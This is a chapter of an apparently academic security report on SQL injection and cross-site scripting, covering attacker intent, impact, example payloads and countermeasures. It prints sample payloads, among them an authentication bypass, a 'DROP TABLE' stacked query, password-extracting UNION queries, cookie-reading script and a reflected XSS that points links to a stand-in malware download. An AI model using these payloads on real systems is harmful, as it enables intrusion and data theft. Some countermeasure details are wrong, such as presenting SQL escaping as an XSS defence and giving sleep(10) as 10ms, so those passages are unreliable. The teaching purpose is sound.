This section of the report will provide an analysis of two common security attacks, SQL Injection and Cross-site Scripting. The aim is to have a comprehensive understanding of what they are, how they work and how to prevent them from happening. 

\section{SQL Injection (SQLi)}

%http://cwe.mitre.org/data/definitions/89.html


SQL injection is identified as one of the serious threats to Web Applications. OWASP Top 10 which describes the ten most critical web application security risks, identified injection attacks as their number 1 threat \cite{owasp}. A SQL injection is classed as a type of malicious code-injection, where an attacker can execute SQL statements via an input to gain unauthorised and potentially unlimited access. "Data provided by an actor is included in a SQL query in such a way that a part of the actor's input is treated as SQL code" \cite{halfond2006classification}.


\subsection{Actors}

SQL injection exploit is easy to carry out, because of this its possible to consider anyone to be an actor. Anyone who is able to input untrusted data to the system, this includes both external and internal actors. 


\subsection{Intent}

A SQL injection attack can be performed with different goals in mind. A categorisation of these various intentions has been defined here.


    
    \subsubsection{Identify Injectable Parameters}
    
    The first stage is to probe the target web application to discover where the vulnerable parameters and input field are for a successful SQL injection attack.
    
    \subsubsection{Database Fingerprint}
    
    To exploit a SQL injection vulnerability fully, an attacker will try to determine the type of database management system the web application is using, and it's version. Individual DBMS and versions react differently to exploits. With this information, the attacker can then refine or customise their exploit for the target DBMS and version.
    
    \subsubsection{Determine Database Schema}
    
    Each web application is different with a different number of databases and different schemas. For an attacker to read or extract information in the database, the attacker needs to know the database schema such as the table names and columns. 
    
    \subsubsection{Reading and Extracting Data}
    
    This is the most common type of attack. The attackers' intention is to read values from the database and download the data locally. This is more serious depending on the domain of target, the information held in the database could be sensitive and therefore very desirable for an attacker to use or sell.
    
    \subsubsection{Modifying Data}
    
    The intent of the attack may be to add or modify the information in the database. This could be used to try and deface the web application.
    
    
    \subsubsection{Performing Denial of Service Attack}
    
    Denial of service attack is an attack that attempts to disrupt a web application or a complete shutdown of the database, rendering the web application unusable for all users. 
    
    
    % \subsubsection{Evading Detection}
    
    \subsubsection{Bypassing Authentication}
    
    The attacker intends to bypass the database and application authentication mechanisms. By bypassing the authentication mechanisms, an attacker can pose as another privileged user giving them access to otherwise unauthorised information.
    
    \subsubsection{Executing Remote Commands}
    
    A SQL injection vulnerability could lead to the execution of remote commands on the web applications server. The intention of this attack is to go further than just having access to the database. Rather the goal is to have remote access to the server, where more attacks could be performed.
    
    \subsubsection{Escalating Privileges}
    
    Privilege writes are stored in the database and therefore if an attacker has update writes to a database they can perform an attack where they can elevate their own privileges for more severe attacks.


\subsection{Impact}

The impact of a SQL injection attack can vary, deepening on the scope there will be different consequences.

\begin{table}[H]
% \centering
\begin{tabular}{|p{3cm}|p{13cm}|}
\hline
 \textbf{Scope} & \textbf{Impact} \\
 \hline
 Confidentiality 
 & Depending on the application, a SQL database could hold sensitive information about the organisation, their research or even customer sensitive data such as names, emails, passwords and addresses. A loss of confidentiality is a common problem with a SQL injection vulnerability.  \\
 \hline
 Integrity
 & If it's possible to read sensitive information after losing confidentiality, it may also be possible to make changes to the data such as updating or deleting the data. A loss of information integrity is a real consequence with a SQL injection attack. \\
 \hline 
 Authentication \& Authorisation
 & It is possible that an attacker may be able to connect to the application as another user without previously knowing their username or password. Additionally, as access control information is commonly stored in the database, it's possible to elevate the users' permission. Therefore a SQLi attack can cause a loss of both Authentication and Authorisation. \\
 \hline
 Non-repudiation
 & Tampering with the existing data has other consequences such as causing repudiation issues. Once data has been illegally modified it is hard to maintain non-repudiation between all parties, i.e. the party who stores the information and the party whose information it belongs too. \\
\hline
\end{tabular}
\caption{Impact of SQL Injection Vulnerability}
\label{table:SQLi Impact}
\end{table}


\subsubsection{Technical}

In a SQL injection attack, the point of entry is at the database level, but the impact of a SQLi attack does not stop at the database level. It is not uncommon to see the technical impact reaching the application server as attackers are uploading a shell which leaves a backdoor to the server of the system.

\subsubsection{Business}

A SQLi attack can severely affect the public image of an organisation. People lose confidence in the organisations' ability to maintain the confidentiality and integrity of their sensitive information. In addition, a SQLi vulnerability could lead to a loss company secrets, such as their clients, suppliers, marketing strategies and new products. All of the above translates and ultimately could result in a loss of profits.

\subsection{Examples}

\subsubsection{Simple}

An attacker may try a simple method first to detect a SQL injection vulnerability. Adding an apostrophe (') at the end of a URL query string (as shown in Listing 3.1) in a GET request to the server. This can help determine if this input is vulnerable to SQL injection.


\begin{lstlisting}[language=HTML, caption=SQL Injection - Finding A Vulnerability]
    http://{..}/index.php?account_id=321'
\end{lstlisting}

\noindent
If it is vulnerable, the web application may show an error message (as shown in listing 3.2), this is because the apostraphe (') that was added is being treated as part of the SQL query.


\begin{lstlisting}[language=SQL, caption=SQL Injection - Error Message]
    Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
\end{lstlisting}
Once this is determined, an attacker can simply append any legal SQL statement onto the end of the URL string.

\subsubsection{Tautologies}

Tautologies are SQL injection queries which are injected into conditional statements so that they are always evaluated to be true. This allows an attacker to bypass authentication, identify injectable parameters or extract data. 

\begin{lstlisting}[language=SQL, caption=SQL Injection - Conditional Statement]
    Normal: SELECT * FROM users
            WHERE username='' AND password=''
             
    SQLi:   SELECT * FROM users
            WHERE username='' OR 1=1 -- AND password=''
\end{lstlisting}

\noindent
Consider the above SQL code. An attacker has injected "OR 1=1 --" to the username, we know 1=1 is always true, so this statement will be accepted. The inputs for the other fields are made irrelevant, by adding -- the rest of the SQL statement gets commented out and does not execute. The outcome is that the injected query bypasses the authentication of having a correct username and password by inserting a tautology query.

\subsubsection{Fingerprinting the Database}

As mentioned previously, an attacker may attempt to fingerprint the database to determine the SQL Server the application is using and which version. As already mentioned, SQL query exploits can be customised depending on the SQL server.

\noindent
One method of fingering printing is to simply observe the error message returned by the web application. For example, the error message is shown in listing 3.2 clearly states that it is a "MySQL" server. 

\bigbreak
\noindent
Additionally, we can inject a "UNION" statement which selects the version of the database server.

\begin{lstlisting}[language=SQL, caption=SQL Injection - Database Fingerprinting]
    SELECT * FROM users where id = 1
    UNION
    SELECT 1, version() limit 1,1
    
    Oracle:         ORA-00933: SQL command not properly ended
    MS SQL Server:  Microsoft SQL Native Client error '80040e14'
    PostgreSQL:     Query failed: ERROR: syntax error at or near
\end{lstlisting}

\subsubsection{Stacked Queries}

A stacked query is where an attacker attempt to inject additional queries at the end of the original query. As a result, the database receives multiple stacked SQL queries, the legally intended query and the illegal unintended queries that an attacker has appended on. Both intended and unintended queries will be executed, which can be very harmful.

\begin{lstlisting}[language=SQL, caption=SQL Injection - Stacked Queries]
    SELECT firstname, lastname, address FROM users 
    WHERE username = $usename
    
    http://{..}/profile.php?username=johndoe; DROP TABLE users
\end{lstlisting}

\noindent
The above SQL query can be exploited if the input is vulnerable to a SQL injection. An attacker ends the intended query with ";" and then starts their illegal query. In the example above the users, the table would be dropped.


\subsubsection{Union Queries}

Union queries are used to find information about other related tables. This is done by exploiting an existing vulnerable parameter, joining the original query with an illegal querying using the "UNION" command. This tricks the application into returning a data set from a table which is different from the one that was intended to be accessed by the developer. 

\begin{lstlisting}[language=SQL, caption=SQL Injection  - Union Queries]
     http://{..}/profile.php?username=johndoe UNION SELECT {...}
     
     SELECT * FROM users
     UNION SELECT * from credit_card where username = 'johndoe'
\end{lstlisting}

The above illegal union query attempts to join a "credit\_card" table, allowing an attacker to access information in a table which was otherwise inaccessible. 

\subsubsection{Stored Procedures}

There is a misconception that SQL stored procedures can prevent against malicious SQL Injection attacks. If the input is not sanitised, it is still vulnerable to malicious SQL that could be executed in the stored procedure. A database server may have default stored procedures with added functionality to interact with the operating system. There is a concern if a SQLi attack can interact with the above mentioned stored procedures.

\subsubsection{Blind Injection}

Blind injection is where information is retrieved by inferring from the response of the application after it is questioned with true or false queries.


\subsubsection{Time Delay}

Time delay injection attacks can collect information by observing the response time i.e the behaviour of the database. This technique involves injecting queries that are conditional statements (true/false), if there is a delay in response time, an assumption can be made that the conditional query is true. Time delay techniques can vary depending on the DBMS.

\begin{lstlisting}[language=SQL, caption=SQL Injection  - Time Delay]
     http://{..}/product.php?id=123 AND IF(version() like '5\%', sleep(10), 'false'))--
\end{lstlisting}

The above query statement tries to determine the version of the database server, if the version is like 5 then database server should sleep for 10ms. If the database does delay, then an assumption can be made in that the conditional statement is true and therefore the database version is 5.

\subsubsection{Alternative Encoding}

Alternative encoding tries to avoid being detected by automated SQL injection prevention mechanisms and defensive coding practices. This method is combined with other attack methods. It is not a way to attack but rather it can be used in conjunction with other attack techniques to evade detection. This is because many prevention mechanisms may look for certain strings that resemble a typical SQL injection queries, however, if the string is encoded it becomes harder to detect. The SQLi attack strings are usually encoded in hexadecimal, ASCII or Unicode which bypasses a lot of the existing prevention techniques.

\bigbreak

\begin{lstlisting}[language=SQL, caption=SQL Injection - Alternative Encoding]
    Normal SQLi: ' UNION SELECT password FROM Users WHERE name='admin'--
    
    URL Encoded: %27%20UNION%20SELECT%20password%20FROM%20Users%20WHERE%20name%3D%27admin%27--
    
    Hexideicmal: ' UNION SELECT password FROM Users WHERE name=61646d696e
\end{lstlisting}


\subsubsection{Automated Exploitation}

Finally, there are automated exploitation techniques that can run most of the example exploits identified above. In penetration testing, scripts have been developed such as SQLMap \cite{sqlmap}. SQLMap is an open source penetration testing tool which automates the process of testing for a SQL Injection vulnerability.

\subsection{Countermeasures}

Given the examples provided above, it is important to protect the web application from SQL injections attacks. Fortunately, there are numerous countermeasures which can be put into practice to help detect and prevent such SQL injection vulnerabilities.


\subsubsection{Prepared Statements}

Prepared statements should be the primary mechanism for preventing SQL injection attacks. Prepared statements are used in the development process. They are templates which are predefined pieces of code that act as placeholders for specific input data. Prepared statements ensure that a malicious actor is not able to change the query in a way that was not intended by the developer. Prepared statements are available in all back-end development languages. 


\begin{lstlisting}[language=PHP, caption=SQL Injection - PHP Prepared Statement]
    $stmt = $conn->prepare("SELECT users WHERE username = :username ")
    $stmt->bindParam(':username', $username);
\end{lstlisting}


\subsubsection{Sanitising/Escaping Input Data}

Sanitization is the removal of malicious content from a users input. It is a method which helps to avoid security issues such as SQLi and XSS. Sanitising/filtering/escaping data can take on a few different forms. They can be as simple as removing odd symbols from the input, or ensuring any code like input is only treated as a string, rather than code.
 
\subsubsection{Manual Approach}

The manual approach involves using defence coding practices and code review. However, this method requires the developers to have a good knowledge of SQL injections. In addition, this approach is best applied at the development stage because manual monitoring and checking can be a laborious task, especially if the code base is quite large. 

\subsubsection{Automated Approach}

The automated approach involves running crawlers on a web application to find vulnerabilities in the applications input fields. 

\subsubsection{Least Privilege}

The principle of least privilege is assigning minimum access rights. This policy should be adopted to minimise the access rights assigned to every account. Having strict access rights can reduce the potential impact of a SQL injection attack. An account should rarely have all privileges (READ, CREATE, UPDATE and DELETE), this type of account is reserved for the admin role. The admin role should not be the one performing all database transactions for the application as in the event of a SQL injection attack it could have severe implications. 

\subsubsection{Multiple Database Users}

As mentioned previously the application should not be using the admin accounts to perform all transactions in the web applications database. Setting up different database users will significantly reduce the impact of the SQL injection attack and in doing so prevent an attacker from performing a more severe attack. For example, pages that only display information should be handled by a read only access user account, other pages that need update access should be controlled by the relevant database account with update privileges.


\subsubsection{Suppressing Error Messages}

Error messages are important during the development life cycle of the application, but as soon as the application goes lives, the error messages should be suppressed and replaced with generic messages. A malicious actor can often use the error messages as shown previously to gain information about the vulnerabilities of the application. 


\newpage
\section{Cross-site Scripting (XSS)}


Cross-site Scripting is another type of malicious code injection, and it is a serious security threat. XSS has consistently been in the Top 3 most dangerous threats to web applications. In OWASPS 2017 top 10 it has again been ranked Number 3. Cross-site scripting is another vulnerability that is simply caused by failing to check the users' input. XSS is performed with JavaScript code. Cross-site Scripting is where malicious code is entered into an input field that has no validation, as a result of this the attackers' script is executed on the web application.

\subsection{Actors}

Similar to SQLi attacks, XSS is a simple attack to perform on an application that is vulnerable. It is possible for anyone who understands JavaScript to be a malicious actor. The attack is straightforward, and web applications have many fields where the user can input data. As a consequence, this type of attack is frequently attempted and is almost wide spread.

\subsection{Intent}

An attack can be performed with different goals in mind. A categorisation of these various intentions has been defined here.

    \subsubsection{Identify Vulnerable Inputs}
    
    An attacker might initially probe the website looking for input parameters that are exploitable. This is done by inputting script tags in the input parameters. This is an easy way to test if an input is vulnerable, it is initially harmless and a simple attack, but once a vulnerability has been found a more serious attack can take place.
    
    \subsubsection{Deface Websites}
    
    Deface a website is a common thing for an attacker to do when a vulnerability is found. Defacing a website involves changing the content and/or appearance of a website. Sometimes an attacker may do this technique to inform about the vulnerability, simply to advertise about their achievement or even to spread a message which may be politically motivated, these attackers are often referred to as "hacktivists"
    
    \subsubsection{Redirect to malicious website}
    
    Another goal of the attacker could be to redirect users to a different website. The redirected websites may be a website the attacker has setup, which often contains more malicious activities that bait the users into downloading harmful software which have a greater consequence. Or simply redirect users to websites with a lot of pop-ups and adult advertisements which may provide a small income for an attacker.
    
    \subsubsection{Hijack User Session}
    
    A more serious intention would be to hijack a legitimate users session. Session or cookie hijacking involves taking over the session of a legitimate user. Using the legitimate users' information the attacker then communicates to the web application. The application still believing it is talking to an authorised user may unknowingly send private information to the attacker, thinking it is communicating with the legitimate user.
    
    \subsubsection{Steal Private Information}
    
    XSS might also be used to steal confidential data about the user. Private information could be stored in a cookie or session token which is located on the users' browser. An XSS attack can be used to gain access to private JavaScript variables. Therefore the attacker will be able to read the contents of these variables, stealing any private information they may contain.
    
    \subsubsection{Keylogging}
    
    The attackers' intention of performing an XSS attack may be to implement a key logger. An attacker can log all the keystrokes a potential victim makes. The attacker can then send the results of the keylogger to a different site, usually one owned by the attacker or a site he can safely download the keystroke information. Having the key logging information about a particular user can cause serious harm as it may give away private information such as user credentials. 

\subsubsection{Access to external devices }

Some web applications may now ask for permission to access a users' external device or hardware, such as camera or GPS. A successful XSS exploit on that web application could lead to the camera and GPS data being used or sold on.

\subsection{Impact}

The impact of a Cross-site scripting attack can vary, deepening on the scope there will be different consequences.

\begin{table}[H]
% \centering
\begin{tabular}{|p{3cm}|p{13cm}|}
\hline
 \textbf{Scope} & \textbf{Impact} \\
 \hline
 Confidentiality 
 &Session tokens and cookies can hold sensitive information about users. An attacker can exploit a XSS vulnerability to get access to this information. This is a common type of XSS attack which causes a loss of user confidentiality. \\
 \hline
 Integrity
 &Through an XSS exploit, JavaScript variables are prone to being read and modified. Modified variables such as cookie tokens can cause a loss of information integrity where the web application would be none the wiser.  \\
 \hline 
 Authentication \& Authorisation
 &Its possible to impersonate a legitimate user by stealing their session token. The session token tells the web application who the user is. The web application does not have a way of knowing that the session token was stolen. Therefore an attacker can pretend to be a legitimate user and perform actions they were previously unable to do. This causes a loss of reliable authentication and authorisation. \\
 \hline
 Non-repudiation
 & Tampering with the existing data has other consequences such as causing repudiation issues. Once data has been illegally modified it is difficult to maintain non-repudiation between all parties, i.e. the party who stores the information and the party whose information it belongs to. \\
\hline
\end{tabular}
\caption{Impact of Cross-site Scripting XSS Vulnerability}
\label{table:XSS Impact}
\end{table}


    \subsubsection{Technical}
    
    The likelihood of a XSS exploit is quite high, on the surface a XSS attack is quite simple, but more complex XSS types can have severe technical impacts to the web application and beyond.
    
    \subsubsection{Business}
    
    An XSS attack can severely affect the public image of an organisation. People lose confidence in the organisations' ability to maintain the confidentiality and integrity of their sensitive information. In addition, a XSS vulnerability could lead to a loss company secrets, such as their clients, suppliers, marketing strategies and new products. All of the above translates and ultimately could result in a loss of profits.


\subsection{Examples}

    \subsubsection{Simple}

An attacker will attempt a simple method of XSS to try and identify a Cross-site scripting vulnerability. One way they might do this is by adding a simple alert message in an input field to see if the web application executes the script.

\begin{lstlisting}[language=java, caption=Cross-site Scripting - Finding a Vulnerability]
    <script>alert("Hello World")</script>
\end{lstlisting}

\noindent
If the application executes the script, an alert pop up will show, this is an indication that the particular input field is vulnerable to a XSS attack.

    \subsubsection{Reflected XSS (Non Persistent)}

Reflected XSS is when an attacker injects executable code, and the injected code is not stored within the application. Therefore it is not persistent. It only impacts a user who unknowingly opens a bad link or malicious third-party website. 

\begin{lstlisting}[language=java, caption=Cross-site Scripting - Reflected XSS]
    http://example.com/index.php?badinput=<script>window.onload = function() {var AllLinks=document.getElementsByTagName("a"); 
    AllLinks[0].href = "http://malicious.com/malicious.exe"; }</script> 
\end{lstlisting}

\noindent
The above example is a reflected XSS attack. It appears just to be a link to a legitimate website "example.com" however, this site has an input vulnerable to XSS called "badinput". In the input the attacker injects some JavaScript code, the code changes a link within the website which if clicked will download a malicious.exe file onto the users' machine.

    
    \subsubsection{Stored XSS (Persistent)}
    
Stored XSS is more dangerous than reflected XSS because it is persistent. Web applications that allow users to store data are potentially exposed to this attack. Stored XSS is when a user enters malicious data into an input, e.g. a name on a profile page, that input is then stored in the database of the website. The stored data could be a malicious script. The website then renders/displays the stored data back to the page, which leads to harmful code being embedded in the website.

\begin{lstlisting}[language=java, caption=Cross-site Scripting - Stored XSS]
    <input class="inputbox" type="text" name="email" size="40" value="email@example.com"><script>alert(document.cookie)</script>
\end{lstlisting}
    
The example above shows a Stored XSS attack. The website has an input field for a user to enter their email. However, a malicious actor enters a malicious script into this input instead. In the example given the attacker has added an alert message which displays the users' cookie information.

    \subsubsection{DOM-Based XSS}
    
DOM based XSS is where a payload or malicious script is executed as a result of modifying the DOM environment. The Document Object Model (DOM) just defines the structure of web documents e.g., tables, tbody, tr and td. DOM-based XSS or Client Based XSS can occur when un-trusted data inputted by the user is then used to update the DOM. 

\begin{lstlisting}[language=java, caption=Cross-site Scripting - DOM-based XSS]
    var loc = document.location + '?redirectHome=1'; 
    document.write('<a href="' + loc + '">Home</a>');
\end{lstlisting}

With this example, the website has a variable called "loc" which redirects users to the home page. However, this location variable is being written in JavaScript on the client side. An attacker can manipulate this variable by writing their own document.write. An attacker is then able to introduce some malicious code, for example, to view or modify the users' cookies, form data or send them to a harmful website.


    \subsubsection{Automated Attacks}

There are advanced frameworks such as BeEF \cite{beef} which can be used to exploit JavaScript XSS vulnerabilities. BeEF is a penetration testing tool which can find weaknesses of a website and perform advanced XSS attacks. 

\newpage
\subsection{Countermeasures}

    \subsubsection{Escaping User Input}

 Escaping user input strips the input from any code/HTML special characters it contains. This adds a prevention mechanism for Stored XSS attacks, as a users input is checked and any harmful elements of the input are escaped. For example, a '<' will be escaped to "\&lt;".
 
\begin{lstlisting}[language=php, caption=Cross-site Scripting - Escaping Input Data]
    $email = $mysqli->real_escape_string($email);
\end{lstlisting}

The above example is an inbuilt PHP function which escapes the email string inputted by the user before being inserted into the database. This function should be used on any user inputted data These functions can be found in most backend frameworks and help to prevent against a potential Stored XSS attack.


\subsubsection{Input Validation}

Another method for countering a potential XSS attack is to validate user input. This is achieved by verifying that the incoming parameters conform to what is expected of the field. For example, in a phone number input field, you can expect there to be a limited number of characters which should be entered into this field, and they should be numeric. Verifying user input stops a malicious user from executing harmful code by injecting it into an input field.

\subsubsection{URL Encoding}

Similar to escaping HTML entities in user input, it is also important to escape any URL parameters injected by the user. One way to achieve this is by encoding the URL. URL encoding will replace unsafe characters with characters in a valid ASCII format. 

\subsubsection{Firewall}

 A firewall can be configured to detect known XSS based on a particular signature. If a known XSS is detected, the firewall can stop traffic between the server and this particular user. However, the XSS must already be known to the firewall.
 
 \section{Summary}
 
 This chapter has covered an analysis of two types known attacks which are classified as malicious code, SQL injection and Cross-Site Scripting. The chapter covered the actors involved in each attack, the intentions of the attack as often they vary and a result there will be different levels of impact. Additionally, the chapter covers examples of these kinds of attack and finally the countermeasure on how to prevent or reduce the threat.